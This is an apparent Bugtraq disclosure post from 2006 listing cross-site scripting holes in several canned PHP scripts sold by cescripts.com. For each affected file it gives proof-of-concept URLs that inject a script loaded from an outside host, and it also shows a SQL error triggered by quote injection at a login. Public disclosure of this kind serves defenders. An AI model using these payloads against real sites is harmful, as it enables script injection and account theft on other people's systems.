cescripts.com - XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: cescripts.com - XSS
From: luny@xxxxxxxxxxxxxxx
Date: 11 Jun 2006 21:03:35 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Cescripts.com Scripts

Below are scripts I tested from the site cescripts.com. This site seels to be 
selling canned scripts, full of errors. Anyways, take a look:

Car Classifieds

Homepage:
http://www.cescripts.com/

effected files:
index.php

XSS Vulnerabilities PoC:

Viewing a car:
http://www.example.com/car_classifieds/listings/index.php?pag=car_view&car_id=32&offset=0&ord=1&make_id=63'>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT>

The Car listings:
http://www.example.com/car_classifieds/listings/index.php?pag=car_list&ord=1&make_id=63'>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT>


Screenshots:

http://www.youfucktard.com/xsp/car1.jpg
http://www.youfucktard.com/xsp/car2.jpg
http://www.youfucktard.com/xsp/car3.jpg
http://www.youfucktard.com/xsp/car4.jpg
--------------------------------------------------

Event Registration ALL VERSIONS

Effected files:
view-event-details.php
event-registration.php

view-event-details.php XSS Vuln:

http://www.example.com/rsvp3/view-event-details.php?event_id=74'>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT>

Event-registration-details.php XSS Vuln:
http://www.example.com/rsvp3/event-registration.php?select_events=74'>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT>&submit=Register


Screenshots:
http://www.youfucktard.com/xsp/event1.jpg
http://www.youfucktard.com/xsp/event2.jpg

------------------------------------------------
Fast Menu Restaurant Ordering v1.0

Effected files:
index.php

XSS Vuln PoC on sel_menu variable:
http://www.example.com/fastmenu/index.php?pag=gift_certificate&sel_menu=5'>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT>

Screenshots:
http://www.youfucktard.com/xsp/frest1.jpg
http://www.youfucktard.com/xsp/frest2.jpg

DB Query error msg upon using sql injection of ' to log in:

Error:db::query() failed.ERROR MESSAGE IS: Failed to run Query:SELECT 
member_id, first_name, last_name FROM member WHERE password='\\'\\'' AND 
username='\\'\\'' You have an error in your SQL syntax. Check the manual that 
corresponds to your MySQL server version for the right syntax to use near '\\'' 
AND username='\\'\\''' at line 3 

-------------------------------------------------

Home Rental Script ALL VERSIONS

Effected files:
index.php

XSS Vuln via sel_menu variable:
This has got to be the worst i've seen yet of this kind. The text is 
everywhere! I think I counted about 20 popups, no joke. 

http://www.example.com/home_rental/index.php?pag=list_properties&act=basket-add&id=17&type=room&ofs=0&day=11&month=6&year=2006&night=1&hotel_id=&show=&sel_menu='>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT>


Screenshots:
 http://www.youfucktard.com/xsp/cereal1.jpg
 http://www.youfucktard.com/xsp/cereal2.jpg
 http://www.youfucktard.com/xsp/cereal3.jpg

---------------------------------------------------

There were a ton of other scripts on the site, but I got tired of testing 
canned scripts =(

Prev by Date: ThWboard 3.0 <= SQL Injection
Next by Date: Stargazer.org - XSS with Session output
Previous by thread: ThWboard 3.0 <= SQL Injection
Next by thread: Stargazer.org - XSS with Session output
Index(es):
- Date
- Thread